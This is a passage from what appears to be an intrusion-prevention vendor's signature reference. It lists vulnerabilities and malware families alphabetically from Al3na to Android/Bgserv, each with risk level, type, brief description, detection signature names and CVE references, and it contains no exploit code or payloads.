About this vulnerability:	Al3na.weakpatheticfool botnet
Risk:	High
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Al3na.weakpatheticfool is an IRC-controlled botnet.
Situation:	Generic_CS-Botnet-Al3na.weakpatheticfool-Activity Generic_SS-Botnet-Al3na.weakpatheticfool-Activity

Alcatel-OmniPCX-Enterprise-Remote-Command-Execution

About this vulnerability:

An Alcatel OmniPCX Enterprise Remote Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-734-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Alcatel OmniPCX Enterprise

Type:

Input Validation

Description:

A vulnerability in Alcatel OmniPCX Enterprise, versions R7.1 and earlier, which allows remote attackers to execute arbitrary commands via shell metacharacters in the user parameter during a ping action.

Situation:

HTTP_CSU_Alcatel-OmniPCX-Enterprise-Remote-Command-Execution

References:

CVE-2007-3010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3010

BID-25694
http://www.securityfocus.com/bid/25694

OSVDB-40521
http://www.osvdb.org/40521

Aldi-Bot

About this vulnerability:	Aldi Bot
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Aldi is a Bot that is used for performing Distributed Denial of Service (DDoS) attacks.
Situation:	HTTP_CSU-Aldi-Bot-Traffic HTTP_CSH-Aldi-Bot-Traffic

Alibaba-Nacos-Authfilter-Authentication-Bypass

About this vulnerability:

A vulnerability in Alibaba Nacos

Risk:

Moderate

First detected in:

sgpkg-ips-1350-5242

Last changed:

sgpkg-ips-1350-5242

Platform:

Generic

Software:

Alibaba Nacos

Type:

Malfunction

Description:

A backdoor that in Nacos servers allows a remote attacker to bypass authentication checks to gain access to endpoints that normally require authentication.

Situation:

HTTP_CS-Alibaba-Nacos-Authfilter-Authentication-Bypass

References:

CVE-2021-29441
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29441

Alibaba-Nacos-ConfigOpsController-Authentication-Bypass

About this vulnerability:

A vulnerability in Alibaba Nacos.

Risk:

High

First detected in:

sgpkg-ips-1375-5242

Last changed:

sgpkg-ips-1375-5242

Platform:

Generic

Software:

Alibaba Nacos

Type:

Insecure Configuration

Description:

A vulnerability in Alibaba Nacos, versions prior to 1.4.1, which allows remote attackers to disclose sensitive information by sending a crafted request to the target server, due to missing authentication controls on the /derby path of ConfigOpsController.

Situation:

HTTP_CS-Alibaba-Nacos-ConfigOpsController-Authentication-Bypass

References:

CVE-2021-29442
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29442

Alienvault-Ossim-Arbitrary-Command-Injection

About this vulnerability:	A vulnerability in AlienVault AlienVault OSSIM
Risk:	Moderate
First detected in:	sgpkg-ips-627-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	AlienVault AlienVault
Type:	Input Validation
Description:	An arbitrary command injection vulnerability has been reported in AlienVault OSSIM. The vulnerability is due to insufficient validation of the password. A remote, authenticated attacker can exploit this vulnerability by sending maliciously crafted input to the affected server. This can result in arbitrary command execution with SYSTEM privileges.
Situation:	HTTP_CRL-Alienvault-Ossim-Arbitrary-Command-Injection HTTPS_CS-Alienvault-Ossim-Arbitrary-Command-Injection HTTPS_CS-Alienvault-Ossim-Arbitrary-Command-Injection-2

Alienvault-Ossim-AV-Centerd-Soap-Requests-Multiple-Command-Execution

About this vulnerability:

A vulnerability in AlienVault AlienVault

Risk:

Moderate

First detected in:

sgpkg-ips-596-5211

Last changed:

sgpkg-ips-1453-5242

Platform:

Generic

Software:

AlienVault AlienVault

Type:

Input Validation

Description:

Multiple command execution vulnerabilities exist in AlienVault OSSIM. The vulnerabilities are due to failure to safely sanitize user data while handling av-centerd SOAP service requests. A remote unauthenticated attacker can exploit these vulnerabilities by sending crafted requests to affected service. Successful exploitation could result in arbitrary command execution with root privileges.

Situation:

File-TextId_Alienvault-Ossim-AV-Centerd-Soap-Requests-Multiple-Command-Execution

References:

CVE-2014-3804
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3804

OSVDB-106816
http://www.osvdb.org/106816

Alienvault-Ossim-AV-Centerd-Util.pm-Get_License-Arbitrary-Command-Execution

About this vulnerability:

A vulnerability in AlienVault AlienVault

Risk:

High

First detected in:

sgpkg-ips-598-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

AlienVault AlienVault

Type:

Input Validation

Description:

An arbitrary command execution vulnerability exists in AlienVault OSSIM. The vulnerability is due to a failure to safely sanitize user data while handling SOAP service requests via the get_license function of Util.pm. A remote unauthenticated attacker can exploit this vulnerability by sending crafted requests to the affected service. Successful exploitation could result in arbitrary command execution with root privileges.

Situation:

HTTP_CS-Alienvault-Ossim-AV-Centerd-Util.pm-Get_License-Arbitrary-Command-Execution

References:

CVE-2014-3805
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3805

OSVDB-108008
http://www.osvdb.org/108008

Alienvault-Ossim-AV-Centerd-Util.pm-Remote_Task-Arbitrary-Command-Execution

About this vulnerability:

A vulnerability in AlienVault AlienVault

Risk:

High

First detected in:

sgpkg-ips-603-5211

Last changed:

sgpkg-ips-1732-5242

Platform:

Generic

Software:

AlienVault AlienVault

Type:

Input Validation

Description:

An arbitrary command execution vulnerability exists in AlienVault OSSIM. The vulnerability is due to a failure to safely sanitize remote_task SOAP requests within Util.pm. A remote unauthenticated attacker can exploit this vulnerability by sending crafted requests to the affected service. Successful exploitation could result in arbitrary command execution with root privileges.

Situation:

File-TextId_Alienvault-Ossim-AV-Centerd-Util.pm-Remote_Task-Arbitrary-Command-Execution

References:

CVE-2014-5210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5210

BID-69239
http://www.securityfocus.com/bid/69239

OSVDB-109581
http://www.osvdb.org/109581

Alienvault-Ossim-AV-Centerd-Util.pm-Request-Arbitrary-Command-Execution

About this vulnerability:

A vulnerability in AlienVault AlienVault

Risk:

High

First detected in:

sgpkg-ips-597-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

AlienVault AlienVault

Type:

Input Validation

Description:

An arbitrary command execution vulnerability exists in AlienVault OSSIM. The vulnerability is due to a failure to safely sanitize user data while handling SOAP requests via Util.pm. A remote unauthenticated attacker can exploit this vulnerability by sending crafted requests to the affected service. Successful exploitation could result in arbitrary command execution with root privileges.

Situation:

HTTP_CS-Alienvault-Ossim-AV-Centerd-Util.pm-Request-Arbitrary-Command-Execution

References:

CVE-2014-3805
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3805

OSVDB-107993
http://www.osvdb.org/107993

Alienvault-Ossim-Framework-Backup-Command-Execution

About this vulnerability:

A vulnerability in AlienVault AlienVault

Risk:

Moderate

First detected in:

sgpkg-ips-612-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

AlienVault AlienVault

Type:

Input Validation

Description:

A command execution vulnerability exists in AlienVault OSSIM Framework. The vulnerability is due to insufficient sanitization of user supplied data that is used to execute backup commands. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the vulnerable server. Successful exploitation could result in command execution with root privileges.

Situation:

Generic_CS-Alienvault-Ossim-Framework-Backup-Command-Execution

References:

CVE-2014-5158
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5158

BID-68998
http://www.securityfocus.com/bid/68998

OSVDB-109579
http://www.osvdb.org/109579

Alienvault-Unified-Security-Management-And-Ossim-Gauge.php-SQL-Injection

About this vulnerability:

A vulnerability in AlienVault OSSIM

Risk:

High

First detected in:

sgpkg-ips-820-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

AlienVault OSSIM; AlienVault Unified Security Management

Type:

Input Validation

Description:

There exists an SQL injection vulnerability in Alienvault Unified Security Management and OSSIM. A remote attacker can use this to execute arbitrary SELECT commands against the database.

Situation:

HTTP_CRL-Alienvault-Unified-Security-Management-And-Ossim-Gauge.php-SQL-Injection

References:

CVE-2016-8582
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8582

Alienvault-Unified-Security-Management-AV-Remote-Code-Execution

About this vulnerability:	A vulnerability in AlienVault Unified Security Management
Risk:	High
First detected in:	sgpkg-ips-705-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	AlienVault Unified Security Management
Type:	Malfunction
Description:	There exists a remote code execution vulnerability in AlienVault Unified Security Management. A remote attacker can use this to execute arbitrary code in the context of the process user.
Situation:	Generic_CS-Alienvault-Unified-Security-Management-AV-Forward-Deserialization-Remote-Code-Execution

Alienvault-USM/OSSIM-Unauthenticated-Command-Injection

About this vulnerability:	Alienvault USM/OSSIM Unauthenticated Command Injection vulnerability
Risk:	High
First detected in:	sgpkg-ips-932-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux
Software:	AlienVault OSSIM; AlienVault Unified Security Management
Type:	Code Injection
Description:	An unauthenticated command injection vulnerability in Alienvault USM/OSSIM, versions 5.3.4 and 5.3.5, which allows remote attackers to pass user input directly to a system call as root.
Situation:	HTTP_CRL-Alienvault-USM/OSSIM-Unauthenticated-Command-Injection HTTP_CRL-Alienvault-USM/OSSIM-Unauthenticated-Command-Injection-2

Allegra-Excel-Import-Insecure-Deserialization

About this vulnerability:

A vulnerability in Allegra

Risk:

Moderate

First detected in:

sgpkg-ips-1699-5242

Last changed:

sgpkg-ips-1699-5242

Platform:

Generic

Software:

Allegra

Type:

Malfunction

Description:

A design weakness of the Excel import functionality causes an insecure deserialization vulnerability in Allegra. A successful exploitation allows an attacker to execute code on the target system.

Situation:

HTTP_CS-Allegra-Excel-Import-Insecure-Deserialization

References:

CVE-2024-22506
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22506

Allegra-Ganttandschexportaction-Directory-Traversal

About this vulnerability:

A vulnerability in Allegra

Risk:

High

First detected in:

sgpkg-ips-1706-5242

Last changed:

sgpkg-ips-1706-5242

Platform:

Generic

Software:

Allegra

Type:

Input Validation

Description:

A directory traversal vulnerability has been reported in Allegra. The vulnerability is due to improper validation of request parameters. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in reading arbitrary files on the target filesystem.

Situation:

HTTP_CRL-Allegra-Ganttandschexportaction-Directory-Traversal

References:

CVE-2023-22361
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22361

Allegra-Getfilecontentasstring-Directory-Traversal

About this vulnerability:

A vulnerability in Allegra Allegra

Risk:

High

First detected in:

sgpkg-ips-1708-5242

Last changed:

sgpkg-ips-1708-5242

Platform:

Generic

Software:

Allegra

Type:

Input Validation

Description:

A directory traversal vulnerability has been reported in Allegra. The vulnerability is due to improper validation of loadJavaScript.action request parameters. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in reading arbitrary files on the target filesystem.

Situation:

HTTP_CRL-Allegra-Getfilecontentasstring-Directory-Traversal

References:

CVE-2024-22530
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22530

Allegra-Siteconfigaction-Improper-Access-Control

About this vulnerability:

A vulnerability in Allegra

Risk:

High

First detected in:

sgpkg-ips-1734-5242

Last changed:

sgpkg-ips-1734-5242

Platform:

Generic

Software:

Allegra

Type:

Malfunction

Description:

An improper access control vulnerability has be reported in Allegra. The vulnerability is due to misconfiguration of an endpoint. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in in code execution.

Situation:

HTTP_CSU-Allegra-Siteconfigaction-Improper-Access-Control

References:

CVE-2024-22512
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22512

Allen-Bradley-PCCC-Protocol-DoS

About this vulnerability:

A vulnerability in Allen-Bradley's Legacy PCCC Protocol.

Risk:

High

First detected in:

sgpkg-ips-1425-5242

Last changed:

sgpkg-ips-1425-5242

Platform:

Generic

Software:

Allen Bradley

Type:

Malfunction

Description:

A vulnerability in Allen-Bradley's Legacy PCCC Protocol, affecting MicroLogix 1100 controllers 1763-L16BWA, 1763-L16AWA, 1763-L16BBB, and 1763-L16DWD, which allows remote attackers to cause a denial of service condition by sending a crafted Programmable Controller Communication Commands (PCCC) packet to the target controller.

Situation:

Generic_CS-Allen-Bradley-PCCC-Protocol-DoS

References:

CVE-2017-7924
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7924

Allied-Telesyn-TFTP-Server-Buffer-Overflow

About this vulnerability:

Allied Telesyn TFTP Server 1.9 Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-647-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Allied Telesyn TFTP

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in Allied Telesyn TFTP Server 1.9 which allows remote attackers to execute arbitrary code, or cause a denial of service condition, via a long filename

Situation:

TFTP_Read-Or-Write-Request-Excessively-Long-Filename

References:

CVE-2006-6184
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6184

BID-21320
http://www.securityfocus.com/bid/21320

OSVDB-11350
http://www.osvdb.org/11350

ALLMediaServer-SEH-Buffer-Overflow

About this vulnerability:

A vulnerability in ALLMediaServer.

Risk:

High

First detected in:

sgpkg-ips-1453-5242

Last changed:

sgpkg-ips-1453-5242

Platform:

Windows

Software:

ALLMediaServer

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability in ALLMediaServer, version 1.6, which allows remote attackers to execute arbitrary code by sending a crafted request, due to a boundary error within the handling of a HTTP request.

Situation:

Generic_CS-ALLMediaServer-SEH-Buffer-Overflow

References:

CVE-2022-28381
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28381

Alpha-Networks-ASL-26555-Wireless-Router-Password-Disclosure

About this vulnerability:

A vulnerability in Alpha Networks ASL-26555 Wireless Router

Risk:

High

First detected in:

sgpkg-ips-607-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Alpha Networks ASL-26555 Wireless Router

Type:

Malfunction

Description:

There is a password disclosure vulnerability in Alpha Networks ASL-26555 wireless router. The vulnerability is due to a design error.

Situation:

HTTP_CSU-Alpha-Networks-ASL-26555-Wireless-Router-Password-Disclosure
HTTP_CSU-Alpha-Networks-ASL-26555-Wireless-Router-Undocumented-API-Call

References:

BID-55092
http://www.securityfocus.com/bid/55092

Alt-N-MDaeamon-Buffer-Overflow-Vulnerability

About this vulnerability:	A vulnerability in Alt-N MDaeamon
Risk:	High
First detected in:	sgpkg-ips-1059-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Alt-N MDaeamon
Type:	Buffer Overflow
Description:	A Buffer Overflow vulnerability exists in Alt-N MDaeamon. A successful exploit could allow the attacker to execute arbitrary code on the affected system.
Situation:	HTTP_CRL-Alt-N-MDaeamon-Buffer-Overflow-Vulnerability

Alt-N-MDaemon-IMAP-Server-Fetch-Command-Buffer-Overflow

About this vulnerability:

A vulnerability in Alt-N Technologies MDaemon

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MDaemon

Type:

Buffer Overflow

Description:

There exists a stack buffer overflow vulnerability in the way Alt-N MDaemon Server handles IMAP requests. The vulnerability is due to lack of boundary protection while processing IMAP FETCH commands. A remote authenticated attacker may exploit this vulnerability to cause a denial of service condition or inject and execute arbitrary code on the vulnerable system within the security context of the affected service, normally System. In a more sophisticated attack where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected service, normally System. In an attack case where code injection is not successful, the affected server will terminate and reset all established connections.

Situation:

IMAP_CS-Alt-N-MDaemon-IMAP-Server-Fetch-Command-Buffer-Overflow

References:

CVE-2008-1358
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1358

BID-28245
http://www.securityfocus.com/bid/28245

Alt-N-MDaemon-Worldclient-Service-Memory-Corruption

About this vulnerability:

A vulnerability in Alt-N Technologies MDaemon

Risk:

Moderate

First detected in:

sgpkg-ips-435-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MDaemon

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Alt-N Technologies MDaemon WorldClient. The vulnerability is due to a NULL pointer dereference in processing a malicious HTTP POST request. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to the target server, causing the server to crash thereby resulting in a denial of service. Upon processing malicious HTTP POST messages, the WorldClient process will terminate, which triggers a Denial of Service condition. Note that this process automatically restarts to resume the normal operation.

Situation:

Generic_CS-Alt-N-MDaemon-Worldclient-Service-Memory-Corruption

References:

CVE-2008-2631
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2631

Alt-N-Technologies-SecurityGateway-Usename-BOF

About this vulnerability:

Buffer overflow allows remote code execution

Risk:

High

First detected in:

sgpkg-ips-208-2032

Last changed:

sgpkg-ips-1589-5242

Platform:

Windows

Software:

Alt-N SecurityGateway

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Alt-N Technologies SecurityGateway. The vulnerability allows a remote unauthenticated attacker to cause a denial of service or to execute arbitrary code with the privileges of the affected service, normally System.

Situation:

HTTP_CRL-Alt-N-Technologies-SecurityGateway-Usename-BOF

References:

CVE-2008-4193
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4193

BID-29457
http://www.securityfocus.com/bid/29457

OSVDB-45854
http://www.osvdb.org/45854

Alt-N-Technologies-SecurityGateway-Username-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Alt-N Technologies SecurityGateway

Risk:

High

First detected in:

sgpkg-ips-156-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Alt-N SecurityGateway

Type:

Buffer Overflow

Description:

References:

OSVDB-45854
http://www.osvdb.org/45854

Alt-N-WebAdmin-User-Parameter-BOF

About this vulnerability:

Buffer overflow in Alt-N WebAdmin

Risk:

High

First detected in:

sgpkg-ips-14-1102

Last changed:

sgpkg-ips-1589-5242

Platform:

Windows

Software:

Alt-N WebAdmin

Type:

Buffer Overflow

Description:

Alt-N WebAdmin is vulnerable to a buffer overflow in the USER parameter of the webadmin.exe script. By default, webadmin.exe is started as a system service. By sending an overly long string to the USER parameter, a remote attacker can overflow the buffer and execute arbitrary code with system privileges.

Situation:

HTTP_CRL-Alt-N-WebAdmin-User-Parameter-BOF

References:

CVE-2003-0471
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0471

BID-8024
http://www.securityfocus.com/bid/8024

OSVDB-2207
http://www.osvdb.org/2207

Altnet-Download-Manager-ADM4-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in Altnet Download Manager

Risk:

High

First detected in:

sgpkg-ips-262-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Altnet Download Manager; Kazaa; Grokster

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Altnet Download Manager ADM4 ActiveX control. The vulnerability is due to an error in a particular method exposed by the ActiveX control. A particular setup parameter suffers insufficient input validation. An exploitation may lead to arbitrary code execution in the context of the current user.

Situation:

HTTP_SS-Altnet-Download-Manager-ADM4-ActiveX-Control-Buffer-Overflow
File-Text_Altnet-Download-Manager-ADM4-ActiveX-Control-Buffer-Overflow

References:

CVE-2007-5217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5217

BID-25903
http://www.securityfocus.com/bid/25903

OSVDB-38435
http://www.osvdb.org/38435

Altnet-Peer-Points-Manager

About this vulnerability:	Altnet Peer Points Manager
Risk:	Low
First detected in:	sgpkg-ips-614-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Altnet Peer Points Manager
Type:	Misconfiguration
Description:	Altnet Peer Points Manager is a peer to peer program usually received along with another installation such as Kazaa. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Altnet-Peer-Points-Manager

Altnet-Topsearch

About this vulnerability:	Altnet TopSearch
Risk:	Low
First detected in:	sgpkg-ips-614-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Altnet TopSearch
Type:	Misconfiguration
Description:	Altnet TopSearch is a peer to peer program. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Altnet-Topsearch

Alueron

About this vulnerability:	Alueron
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Alueron is a Trojan that tries to steal user credentials, passwords and credit card information from the infected machine.
Situation:	HTTP_CSU-Alueron-Activity

Amcrest-Dahua-NVR-Camera-Denial-Of-Service

About this vulnerability:

An attempt to exploit a vulnerability in Amcrest Dahua NVR Camera detected

Risk:

High

First detected in:

sgpkg-ips-1407-5242

Last changed:

sgpkg-ips-1407-5242

Platform:

Generic

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Amcrest Dahua NVR Camera detected.

Situation:

Generic_CS-Amcrest-Dahua-NVR-Camera-Denial-Of-Service

References:

CVE-2020-5735
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5735

Amlib-NetOPAC-Stack-Remote-Buffer-Overflow

About this vulnerability:

An Amlib NetOPAC Stack Remote Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-787-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Amlib NetOPAC

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Amlib NetOPAC, version 5.2.0.4, in in the e, which allows remote attackers to execute arbitrary code thought a long app parameter.

Situation:

HTTP_CSU-Amlib-NetOPAC-Stack-Remote-Buffer-Overflow

References:

BID-42293
http://www.securityfocus.com/bid/42293

AmmSoft-ScriptFTP-Buffer-Overflow

About this vulnerability:

An AmmSoft ScriptFTP Buffer Overflow vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-714-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

AmmSoft ScriptFTP

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in AmmSoft ScriptFTP 3.3 which allows remote attackers to execute arbitrary code via a long GETLIST or GETFILE command in a ScriptFTP script.

Situation:

Generic_CS-AmmSoft-ScriptFTP-Buffer-Overflow

References:

CVE-2011-3976
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3976

BID-49707
http://www.securityfocus.com/bid/49707

OSVDB-75633
http://www.osvdb.org/75633

AMX-NetLinx-VNC-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in AMX NetLinx VNC ActiveX control

Risk:

High

First detected in:

sgpkg-ips-114-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

AMX NetLinx

Type:

Buffer Overflow

Description:

There is a vulnerability in AMX NetLinx VNC ActiveX control. The vulnerability is due to insufficient validating of user supplied parameters.

Situation:

HTTP_AMX-NetLinx-VNC-ActiveX-Control-Buffer-Overflow
File-Text_AMX-NetLinx-VNC-ActiveX-Control-Buffer-Overflow

References:

CVE-2007-3536
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3536

BID-24703
http://www.securityfocus.com/bid/24703

OSVDB-37672
http://www.osvdb.org/37672

Analogx-SimpleServer-Msdos-Device-Name-DoS

About this vulnerability:

Denial of Service (DoS) vulnerability in AnalogX SimpleServer:WWW

Risk:

Low

First detected in:

sgpkg-ips-18-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 98; Windows ME

Software:

AnalogX SimpleServer:WWW

Type:

Malfunction

Description:

AnalogX SimpleServer:WWW HTTP server is vulnerable to a Denial of Service (DoS) attack. An attacker can send a URL request appended with "aux" to the server to cause the server to crash. The server must be restarted in order to regain normal functionality.

Situation:

File-Text_Android-Content-Provider-File-Disclosure

References:

CVE-2001-0386
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0386

BID-2608
http://www.securityfocus.com/bid/2608

OSVDB-3781
http://www.osvdb.org/3781

Android-Content-Provider-File-Disclosure

About this vulnerability:

An Android Content Provider File Disclosure vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-716-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Android

Software:

Google Android Browser

Type:

Input Validation

Description:

A vulnerability in Google Android Browser, versions before 2.3.4, which allows remote attackers to obtain SD card contents via a crafted URL and JavaScript redirect.

Situation:

References:

CVE-2010-4804
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4804

Android-Gingermaster

About this vulnerability:	Android GingerMaster
Risk:	High
First detected in:	sgpkg-ips-617-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Android
Software:	<os>
Type:	Code Injection
Description:	GingerMaster is an Android malware that can be remote controlled.
Situation:	HTTP_CS-Android-Gingermaster.A-3-Traffic HTTP_CRL-Android-Gingermaster-Traffic

Android-Spyeye-Trojan

About this vulnerability:	Android SpyEye trojan
Risk:	High
First detected in:	sgpkg-ips-617-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Android
Software:	<os>
Type:	Code Injection
Description:	SpyEye is a trojan for Android mobile platform.
Situation:	HTTP_CSU-Android-Spyeye-Trojan-Traffic

Android-Stiniter.a

About this vulnerability:	Android Stiniter.A
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Stiniter.A is a virus for Android. It exploits a vulnerability to gain root privilege, posts sensitive information to Internet and sends SMS messages.
Situation:	HTTP_CSU-Android-Stiniter.a-Traffic

Android.Backdoor.Acnetsteal-Botnet

About this vulnerability:	Android.Backdoor.Acnetsteal botnet
Risk:	High
First detected in:	sgpkg-ips-691-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Android
Software:	<os>
Type:	Remote Control
Description:	Android.Backdoor.Acnetsteal is a malware that targets Android hosts.
Situation:	HTTP_CSH-Acnetsteal-Traffic

Android.Backdoor.Obad.a-Botnet

About this vulnerability:	Android.Backdoor.Obad.a botnet
Risk:	High
First detected in:	sgpkg-ips-691-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Android
Software:	<os>
Type:	Remote Control
Description:	Android.Backdoor.Obad.a is a malware that targets Android hosts. The malware can be used to steal the user's personal information and download additional malicious files on the affected machine.
Situation:	HTTP_CRL-Obad-Traffic HTTP_CRL-Obad.a-Traffic

Android.Spyware.Ksapp.A-Botnet

About this vulnerability:	Android.Spyware.Ksapp.A botnet
Risk:	High
First detected in:	sgpkg-ips-691-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Android
Software:	<os>
Type:	Remote Control
Description:	Android.Spyware.Ksapp.A is a malware that targets Android hosts. The malware can be used to prevent gather sensitive information on the affected appliance.
Situation:	HTTP_CRL-Ksapp.A-Traffic

Android.Spyware.Mobilespy.a-Botnet

About this vulnerability:	Android.Spyware.Mobilespy.a botnet
Risk:	High
First detected in:	sgpkg-ips-691-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Android
Software:	<os>
Type:	Remote Control
Description:	Android.Spyware.Mobilespy.a is a malware that targets Android hosts.
Situation:	HTTP_CRL-Mobilespy.a-Traffic

Android.Spyware.TheftSpy-Botnet

About this vulnerability:	Android.Spyware.TheftSpy botnet
Risk:	High
First detected in:	sgpkg-ips-691-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Android
Software:	<os>
Type:	Remote Control
Description:	Android.Spyware.TheftSpy is a spyware that targets Windows hosts.
Situation:	HTTP_CRL-TheftSpy.C-Traffic

Android.Trojan.FakeInst.BL-Botnet

About this vulnerability:	Android.Trojan.FakeInst.BL botnet
Risk:	High
First detected in:	sgpkg-ips-694-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Android
Software:	<os>
Type:	Remote Control
Description:	Android.Trojan.FakeInst.BL is a malware that targets Andoird hosts. It is used to send expensive SMS messages.
Situation:	HTTP_CRL-FakeInst.BL-Traffic

Android.Trojan.FakeLookout-Botnet

About this vulnerability:	Android.Trojan.FakeLookout botnet
Risk:	High
First detected in:	sgpkg-ips-694-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Android
Software:	<os>
Type:	Remote Control
Description:	Android.Trojan.FakeLookout is a malware that targets Android hosts. It opens a backdoor and steals information from the affected machine.
Situation:	HTTP_CSH-FakeLookout-Traffic

Android.Trojan.SMSreg-Botnet

About this vulnerability:	Android.Trojan.SMSreg botnet
Risk:	High
First detected in:	sgpkg-ips-694-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Android
Software:	<os>
Type:	Remote Control
Description:	Android.Trojan.SMSreg is a malware that targets Andoird hosts.
Situation:	HTTP_CRL-SMSreg-Traffic

Android.Trojan.Stealer-Botnet

About this vulnerability:	Android.Trojan.Stealer botnet
Risk:	High
First detected in:	sgpkg-ips-693-5211
Last changed:	sgpkg-ips-1720-5242
Platform:	Android
Software:	<os>
Type:	Remote Control
Description:	Android.Trojan.Stealer is a malware that targets Android hosts. It is used to send expensive SMS messages.
Situation:	HTTP_CRL-Stealer.a-Traffic

Android.Trojan.Uranico-Botnet

About this vulnerability:	Android.Trojan.Uranico.A botnet
Risk:	High
First detected in:	sgpkg-ips-702-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Android
Software:	<os>
Type:	Remote Control
Description:	Android.Trojan.Uranico.A is a malware that targets Android hosts. It is used to steal data from the affected machine.
Situation:	HTTP_CRL_Uranico.A-Traffic

Android/Bgserv-Malware

About this vulnerability:	Android/Bgserv malware
Risk:	High
First detected in:	sgpkg-ips-616-5211
